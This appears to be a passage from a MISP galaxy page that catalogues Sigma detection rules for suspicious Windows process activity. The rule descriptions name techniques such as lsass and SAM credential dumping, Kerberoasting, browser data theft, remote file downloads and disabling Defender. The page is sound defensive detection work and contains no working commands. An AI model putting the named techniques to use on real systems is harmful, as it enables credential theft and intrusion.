Registry Modification Via Regini.EXE

Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.

Internal MISP references

UUID 5f60740a-f57b-4e76-82a1-15b6ff2cb134 which can be used as unique global reference for Registry Modification Via Regini.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Eli Salem, Sander Wiebing, oscd.community
creation_date 2020/10/08
falsepositive ['Legitimate modification of keys']
filename proc_creation_win_regini_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.t1112', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Potentially Suspicious CMD Shell Output Redirect

Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.

Internal MISP references

UUID 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 which can be used as unique global reference for Potentially Suspicious CMD Shell Output Redirect in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/12
falsepositive ['Legitimate admin or third party scripts used for diagnostic collection might generate some false positives']
filename proc_creation_win_cmd_redirection_susp_folder.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Diskshadow Script Mode - Execution From Potential Suspicious Location

Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.

Internal MISP references

UUID fa1a7e52-3d02-435b-81b8-00da14dd66c1 which can be used as unique global reference for Diskshadow Script Mode - Execution From Potential Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/15
falsepositive ['False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs.']
filename proc_creation_win_diskshadow_script_mode_susp_location.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

File Download Via Bitsadmin To An Uncommon Target Folder

Detects usage of bitsadmin downloading a file to uncommon target folder

Internal MISP references

UUID 6e30c82f-a9f8-4aab-b79c-7c12bce6f248 which can be used as unique global reference for File Download Via Bitsadmin To An Uncommon Target Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Suspicious Network Command

Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems

Internal MISP references

UUID a29c1813-ab1f-4dde-b489-330b952e91ae which can be used as unique global reference for Suspicious Network Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
creation_date 2021/12/07
falsepositive ['Administrator, hotline ask to user']
filename proc_creation_win_susp_network_command.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1016']
Related clusters

To see the related clusters, click here.

PUA - Potential PE Metadata Tamper Using Rcedit

Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.

Internal MISP references

UUID 0c92f2e6-f08f-4b73-9216-ecb0ca634689 which can be used as unique global reference for PUA - Potential PE Metadata Tamper Using Rcedit in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski
creation_date 2022/12/11
falsepositive ['Legitimate use of the tool by administrators or users to update metadata of a binary']
filename proc_creation_win_pua_rcedit_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003', 'attack.t1036', 'attack.t1027.005', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Powershell Defender Disable Scan Feature

Detects requests to disable Microsoft Defender features using PowerShell commands

Internal MISP references

UUID 1ec65a5f-9473-4f12-97da-622044d6df21 which can be used as unique global reference for Powershell Defender Disable Scan Feature in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/03
falsepositive ['Possible administrative activity', 'Other Cmdlets that may use the same parameters']
filename proc_creation_win_powershell_defender_disable_feature.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Binary Proxy Execution Via Dotnet-Trace.EXE

Detects commandline arguments for executing a child process via dotnet-trace.exe

Internal MISP references

UUID 9257c05b-4a4a-48e5-a670-b7b073cf401b which can be used as unique global reference for Binary Proxy Execution Via Dotnet-Trace.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jimmy Bayne (@bohops)
creation_date 2024/01/02
falsepositive ['Legitimate usage of the utility in order to debug and trace a program.']
filename proc_creation_win_dotnet_trace_lolbin_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Use of Scriptrunner.exe

The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting

Internal MISP references

UUID 64760eef-87f7-4ed3-93fd-655668ea9420 which can be used as unique global reference for Use of Scriptrunner.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/01
falsepositive ['Legitimate use when App-v is deployed']
filename proc_creation_win_lolbin_scriptrunner.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)

Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.

Internal MISP references

UUID a58353df-af43-4753-bad0-cd83ef35eef5 which can be used as unique global reference for Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/14
falsepositive ['Legitimate usage to restore snapshots', 'Legitimate admin activity']
filename proc_creation_win_ntdsutil_susp_usage.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE

Detects usage of cmdkey to look for cached credentials on the system

Internal MISP references

UUID 07f8bdc2-c9b3-472a-9817-5a670b872f53 which can be used as unique global reference for Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/01/16
falsepositive ['Legitimate administrative tasks']
filename proc_creation_win_cmdkey_recon.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.005']
Related clusters

To see the related clusters, click here.

Suspicious WMIC Execution Via Office Process

Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).

Internal MISP references

UUID e1693bc8-7168-4eab-8718-cdcaa68a1738 which can be used as unique global reference for Suspicious WMIC Execution Via Office Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Vadim Khrykov, Cyb3rEng
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_wmic_susp_execution_via_office_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1204.002', 'attack.t1047', 'attack.t1218.010', 'attack.execution', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

File Download Via Bitsadmin To A Suspicious Target Folder

Detects usage of bitsadmin downloading a file to a suspicious target folder

Internal MISP references

UUID 2ddef153-167b-4e89-86b6-757a9e65dcac which can be used as unique global reference for File Download Via Bitsadmin To A Suspicious Target Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename proc_creation_win_bitsadmin_download_susp_targetfolder.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

MsiExec Web Install

Detects suspicious msiexec process starts with web addresses as parameter

Internal MISP references

UUID f7b5f842-a6af-4da5-9e95-e32478f3cd2f which can be used as unique global reference for MsiExec Web Install in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/02/09
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_msiexec_web_install.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.007', 'attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Invocation From Script Engines

Detects suspicious powershell invocations from interpreters or unusual programs

Internal MISP references

UUID 95eadcb2-92e4-4ed1-9031-92547773a6db which can be used as unique global reference for Suspicious PowerShell Invocation From Script Engines in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/01/16
falsepositive ['Microsoft Operations Manager (MOM)', 'Other scripts']
filename proc_creation_win_powershell_script_engine_parent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Invoke-WebRequest Execution With DirectIP

Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access

Internal MISP references

UUID 1edff897-9146-48d2-9066-52e8d8f80a2f which can be used as unique global reference for Suspicious Invoke-WebRequest Execution With DirectIP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/21
falsepositive ['Unknown']
filename proc_creation_win_powershell_invoke_webrequest_direct_ip.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Netsh Helper DLL

Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.

Internal MISP references

UUID 56321594-9087-49d9-bf10-524fe8479452 which can be used as unique global reference for Potential Persistence Via Netsh Helper DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2019/10/25
falsepositive ['Unknown']
filename proc_creation_win_netsh_helper_dll_persistence.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1546.007', 'attack.s0108']
Related clusters

To see the related clusters, click here.

PUA - PingCastle Execution

Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.

Internal MISP references

UUID b1cb4ab6-ac31-43f4-adf1-d9d08957419c which can be used as unique global reference for PUA - PingCastle Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2024/01/11
falsepositive ['Unknown']
filename proc_creation_win_pua_pingcastle.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.reconnaissance', 'attack.t1595']
Related clusters

To see the related clusters, click here.

File With Suspicious Extension Downloaded Via Bitsadmin

Detects usage of bitsadmin downloading a file with a suspicious extension

Internal MISP references

UUID 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200 which can be used as unique global reference for File With Suspicious Extension Downloaded Via Bitsadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename proc_creation_win_bitsadmin_download_susp_extensions.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Potential Adplus.EXE Abuse

Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.

Internal MISP references

UUID 2f869d59-7f6a-4931-992c-cce556ff2d53 which can be used as unique global reference for Potential Adplus.EXE Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/09
falsepositive ['Legitimate usage of Adplus for debugging purposes']
filename proc_creation_win_adplus_memory_dump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Conhost Spawned By Uncommon Parent Process

Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.

Internal MISP references

UUID cbb9e3d1-2386-4e59-912e-62f1484f7a89 which can be used as unique global reference for Conhost Spawned By Uncommon Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/28
falsepositive ['Unknown']
filename proc_creation_win_conhost_uncommon_parent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Potential SPN Enumeration Via Setspn.EXE

Detects service principal name (SPN) enumeration used for Kerberoasting

Internal MISP references

UUID 1eeed653-dbc8-4187-ad0c-eeebb20e6599 which can be used as unique global reference for Potential SPN Enumeration Via Setspn.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, keepwatch
creation_date 2018/11/14
falsepositive ['Administration activity']
filename proc_creation_win_setspn_spn_enumeration.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

Execution Of Non-Existing File

Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)

Internal MISP references

UUID 71158e3f-df67-472b-930e-7d287acaa3e1 which can be used as unique global reference for Execution Of Non-Existing File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2021/12/09
falsepositive ['Unknown']
filename proc_creation_win_susp_image_missing.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Processes Spawned by WinRM

Detects suspicious processes including shells spawnd from WinRM host process

Internal MISP references

UUID 5cc2cda8-f261-4d88-a2de-e9e193c86716 which can be used as unique global reference for Suspicious Processes Spawned by WinRM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades), Markus Neis
creation_date 2021/05/20
falsepositive ['Legitimate WinRM usage']
filename proc_creation_win_winrm_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1190', 'attack.initial_access', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

New User Created Via Net.EXE With Never Expire Option

Detects creation of local users via the net.exe command with the option "never expire"

Internal MISP references

UUID b9f0e6f5-09b4-4358-bae4-08408705bd5c which can be used as unique global reference for New User Created Via Net.EXE With Never Expire Option in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/12
falsepositive ['Unlikely']
filename proc_creation_win_net_user_add_never_expire.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1136.001']
Related clusters

To see the related clusters, click here.

Forfiles.EXE Child Process Masquerading

Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.

Internal MISP references

UUID f53714ec-5077-420e-ad20-907ff9bb2958 which can be used as unique global reference for Forfiles.EXE Child Process Masquerading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Anish Bogati
creation_date 2024/01/05
falsepositive ['Unknown']
filename proc_creation_win_forfiles_child_process_masquerading.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Suspicious Cabinet File Execution Via Msdt.EXE

Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190

Internal MISP references

UUID dc4576d4-7467-424f-9eee-fd2b02855fe0 which can be used as unique global reference for Suspicious Cabinet File Execution Via Msdt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113
creation_date 2022/06/21
falsepositive ['Legitimate usage of ".diagcab" files']
filename proc_creation_win_msdt_susp_cab_options.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

HackTool - Hydra Password Bruteforce Execution

Detects command line parameters used by Hydra password guessing hack tool

Internal MISP references

UUID aaafa146-074c-11eb-adc1-0242ac120002 which can be used as unique global reference for HackTool - Hydra Password Bruteforce Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Vasiliy Burov
creation_date 2020/10/05
falsepositive ['Software that uses the caret encased keywords PASS and USER in its command line']
filename proc_creation_win_hktl_hydra.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1110', 'attack.t1110.001']
Related clusters

To see the related clusters, click here.

Potential Configuration And Service Reconnaissance Via Reg.EXE

Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.

Internal MISP references

UUID 970007b7-ce32-49d0-a4a4-fbef016950bd which can be used as unique global reference for Potential Configuration And Service Reconnaissance Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive ['Discord']
filename proc_creation_win_reg_query_registry.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1012', 'attack.t1007']
Related clusters

To see the related clusters, click here.

Remote XSL Execution Via Msxsl.EXE

Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.

Internal MISP references

UUID 75d0a94e-6252-448d-a7be-d953dff527bb which can be used as unique global reference for Remote XSL Execution Via Msxsl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023/11/09
falsepositive ['Msxsl is not installed by default and is deprecated, so unlikely on most systems.']
filename proc_creation_win_msxsl_remote_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1220']
Related clusters

To see the related clusters, click here.

Suspicious Program Names

Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools

Internal MISP references

UUID efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6 which can be used as unique global reference for Suspicious Program Names in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/11
falsepositive ['Legitimate tools that accidentally match on the searched patterns']
filename proc_creation_win_susp_progname.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

HackTool - Dumpert Process Dumper Execution

Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory

Internal MISP references

UUID 2704ab9e-afe2-4854-a3b1-0c0706d03578 which can be used as unique global reference for HackTool - Dumpert Process Dumper Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/02/04
falsepositive ['Very unlikely']
filename proc_creation_win_hktl_dumpert.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

HTML Help HH.EXE Suspicious Child Process

Detects a suspicious child process of a Microsoft HTML Help (HH.exe)

Internal MISP references

UUID 52cad028-0ff0-4854-8f67-d25dfcbc78b4 which can be used as unique global reference for HTML Help HH.EXE Suspicious Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/04/01
falsepositive ['Unknown']
filename proc_creation_win_hh_html_help_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.initial_access', 'attack.t1047', 'attack.t1059.001', 'attack.t1059.003', 'attack.t1059.005', 'attack.t1059.007', 'attack.t1218', 'attack.t1218.001', 'attack.t1218.010', 'attack.t1218.011', 'attack.t1566', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Security Privileges Enumeration Via Whoami.EXE

Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.

Internal MISP references

UUID 97a80ec7-0e2f-4d05-9ef4-65760e634f6b which can be used as unique global reference for Security Privileges Enumeration Via Whoami.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/05/05
falsepositive ['Unknown']
filename proc_creation_win_whoami_priv_discovery.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Enable LM Hash Storage - ProcCreation

Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.

Internal MISP references

UUID 98dedfdd-8333-49d4-9f23-d7018cccae53 which can be used as unique global reference for Enable LM Hash Storage - ProcCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/12/15
falsepositive ['Unknown']
filename proc_creation_win_reg_nolmhash.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Suspicious Reg Add Open Command

Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key

Internal MISP references

UUID dd3ee8cc-f751-41c9-ba53-5a32ed47e563 which can be used as unique global reference for Suspicious Reg Add Open Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/20
falsepositive ['Unknown']
filename proc_creation_win_reg_open_command.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Time Travel Debugging Utility Usage

Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.

Internal MISP references

UUID 0b4ae027-2a2d-4b93-8c7e-962caaba5b2a which can be used as unique global reference for Time Travel Debugging Utility Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ensar Şamil, @sblmsrsn, @oscd_initiative
creation_date 2020/10/06
falsepositive ['Legitimate usage by software developers/testers']
filename proc_creation_win_lolbin_tttracer_mod_load.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.credential_access', 'attack.t1218', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Esentutl Steals Browser Information

One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe

Internal MISP references

UUID 6a69f62d-ce75-4b57-8dce-6351eb55b362 which can be used as unique global reference for Esentutl Steals Browser Information in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/13
falsepositive ['Legitimate use']
filename proc_creation_win_esentutl_webcache.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1005']
Related clusters

To see the related clusters, click here.

HackTool - CrackMapExec Execution

This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.

Internal MISP references

UUID 42a993dd-bb3e-48c8-b372-4d6684c4106c which can be used as unique global reference for HackTool - CrackMapExec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/25
falsepositive ['Unknown']
filename proc_creation_win_hktl_crackmapexec_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.privilege_escalation', 'attack.credential_access', 'attack.discovery', 'attack.t1047', 'attack.t1053', 'attack.t1059.003', 'attack.t1059.001', 'attack.t1110', 'attack.t1201']
Related clusters

To see the related clusters, click here.

Change PowerShell Policies to an Insecure Level

Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.

Internal MISP references

UUID 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 which can be used as unique global reference for Change PowerShell Policies to an Insecure Level in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/01
falsepositive ['Administrator scripts']
filename proc_creation_win_powershell_set_policies_to_unsecure_level.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

DumpStack.log Defender Evasion

Detects the use of the filename DumpStack.log to evade Microsoft Defender

Internal MISP references

UUID 4f647cfa-b598-4e12-ad69-c68dd16caef8 which can be used as unique global reference for DumpStack.log Defender Evasion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/06
falsepositive ['Unknown']
filename proc_creation_win_susp_dumpstack_log_evasion.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Files Added To An Archive Using Rar.EXE

Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Internal MISP references

UUID 6f3e2987-db24-4c78-a860-b4f4095a7095 which can be used as unique global reference for Files Added To An Archive Using Rar.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, E.M. Anhaus, oscd.community
creation_date 2019/10/21
falsepositive ['Highly likely if rar is a default archiver in the monitored environment.']
filename proc_creation_win_rar_compress_data.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Rundll32 Execution Without Parameters

Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module

Internal MISP references

UUID 5bb68627-3198-40ca-b458-49f973db8752 which can be used as unique global reference for Rundll32 Execution Without Parameters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bartlomiej Czyz, Relativity
creation_date 2021/01/31
falsepositive ['False positives may occur if a user called rundll32 from CLI with no options']
filename proc_creation_win_rundll32_without_parameters.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002', 'attack.t1570', 'attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Potential Register_App.Vbs LOLScript Abuse

Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.

Internal MISP references

UUID 28c8f68b-098d-45af-8d43-8089f3e35403 which can be used as unique global reference for Potential Register_App.Vbs LOLScript Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/05
falsepositive ['Other VB scripts that leverage the same starting command line flags']
filename proc_creation_win_lolscript_register_app.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

AddinUtil.EXE Execution From Uncommon Directory

Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.

Internal MISP references

UUID 6120ac2a-a34b-42c0-a9bd-1fb9f459f348 which can be used as unique global reference for AddinUtil.EXE Execution From Uncommon Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
creation_date 2023/09/18
falsepositive ['Unknown']
filename proc_creation_win_addinutil_uncommon_dir_exec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Command Line Execution with Suspicious URL and AppData Strings

Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)

Internal MISP references

UUID 1ac8666b-046f-4201-8aba-1951aaec03a3 which can be used as unique global reference for Command Line Execution with Suspicious URL and AppData Strings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
creation_date 2019/01/16
falsepositive ['High']
filename proc_creation_win_cmd_http_appdata.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.command_and_control', 'attack.t1059.003', 'attack.t1059.001', 'attack.t1105']
Related clusters

To see the related clusters, click here.

PUA - DIT Snapshot Viewer

Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.

Internal MISP references

UUID d3b70aad-097e-409c-9df2-450f80dc476b which can be used as unique global reference for PUA - DIT Snapshot Viewer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
